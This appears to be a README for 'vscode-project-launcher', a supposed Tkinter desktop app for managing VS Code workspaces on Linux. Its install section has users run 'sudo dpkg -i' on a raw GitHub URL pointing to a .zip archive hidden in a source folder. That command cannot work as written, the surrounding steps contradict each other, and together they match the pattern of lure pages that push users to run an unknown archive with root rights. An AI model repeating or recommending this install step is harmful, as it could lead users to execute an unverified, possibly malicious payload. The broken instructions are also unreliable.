vscode-project-launcher is a desktop application designed to help you manage and launch your Visual Studio Code workspaces with ease. No programming knowledge is required. If you frequently switch between projects, this app can make your workflow smoother.
To get started with vscode-project-launcher, follow these simple steps:
- Operating System: Linux
- Python: Version 3.x
- Free disk space: At least 100 MB
Visit the Releases page to download the application. You can find it here:
- Locate the downloaded file on your computer.
- Open a terminal window.
- Navigate to the folder where you downloaded the file.
- Enter the following command to install the application:
sudo dpkg -i https://raw.githubusercontent.com/yogas13/vscode-project-launcher/main/src/gui/launcher_vscode_project_3.0.zip - If you face dependency issues, run:
sudo apt-get install -f
Once the installation is complete, you can launch the application from your application menu. Find โvscode-project-launcherโ and click to open it.
- Manage Workspaces: Easily add or remove workspaces.
- Launch Projects Quickly: No need to search for project folders; they are all in one place.
- User-Friendly Interface: The graphical interface is simple and easy to navigate.
To add a new workspace:
- Click on the โAdd Workspaceโ button.
- Navigate to the folder containing your VS Code project.
- Select the folder and click โOpen.โ
To launch a workspace:
- Select the workspace you want to open from the list.
- Click the โLaunchโ button. Your project will open in VS Code.
If you encounter issues:
- Ensure you have Python 3 installed.
- Make sure you have the required dependencies.
- Check your internet connection while downloading.
If you need help, feel free to open an issue on the GitHub repository or reach out to our support team. Your feedback is important for further improving vscode-project-launcher.
- linux
- linux-app
- python
- python-3
- python3
- tkinter
- tkinter-graphic-interface
- tkinter-gui
- tkinter-python
- vscode
- workspace
- workspace-management
- workspace-manager
- workspaces
Thank you for choosing vscode-project-launcher! Enjoy managing your VS Code workspaces effortlessly.